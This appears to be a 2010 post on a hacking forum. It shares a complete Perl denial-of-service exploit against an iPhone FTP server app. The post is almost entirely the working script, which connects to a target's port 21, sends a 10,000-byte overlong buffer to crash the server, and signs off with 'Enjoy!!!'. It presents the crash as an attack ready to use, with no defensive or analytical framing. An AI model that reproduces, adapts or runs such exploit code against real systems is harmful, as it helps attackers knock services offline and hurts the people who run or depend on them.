[x]
We are happy to see you on AH
AH - AndhraHackers is a place to entertain as well to spread knowledge around.
One of the most exciting Indian Community over Internet.

We would like you to Join AH Forum Today.

Why to JOIN AH forum ?
Pages: [1]   Go Down
  Print  
Author Topic: iPhone FTP Server Remote DoS Exploit  (Read 107 times)
0 Members and 1 Guest are viewing this topic.
exploiters
Jr. Member
**

Karma: +1/-0
Offline Offline

Posts: 53


« on: February 24, 2010, 12:43:52 AM »

#!/usr/bin/perl
#
# Exploit: iPhone FTP Server By Zhang Boyang - Remote Dos Exploit
# Version: 1.0
# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8
# Tested on: Iphone 3GS with 3.1.2 firmware
 
 
use IO::Socket;
 
if (@ARGV<1){
    print ("Usage: ./iPhoneFtp <ServerIP>\n");
    exit();
}
 
my $host = $ARGV[0];
my $port = 21;
my $buff = "A" * 10000;
my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port);
unless ($socket) { die "Unable to connect to $host" }
print "Connected to FTP Server\n";
sleep(2);
print "Sending Long Buffer..\n";
sleep(2);
print $socket $buff;
sleep(2);
 
print "FTP server should be crashed by now..Enjoy!!!\n";
Logged
Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
« on: February 24, 2010, 12:43:52 AM »

 Logged
Pages: [1]   Go Up
  Print  
 
Jump to:  


whitec0de.com | Techian.com | GfxLovers.com | CDN Pic | Inj3ct0r Exploit DB | Garage4Hackers
Page created in 0.086 seconds with 27 queries.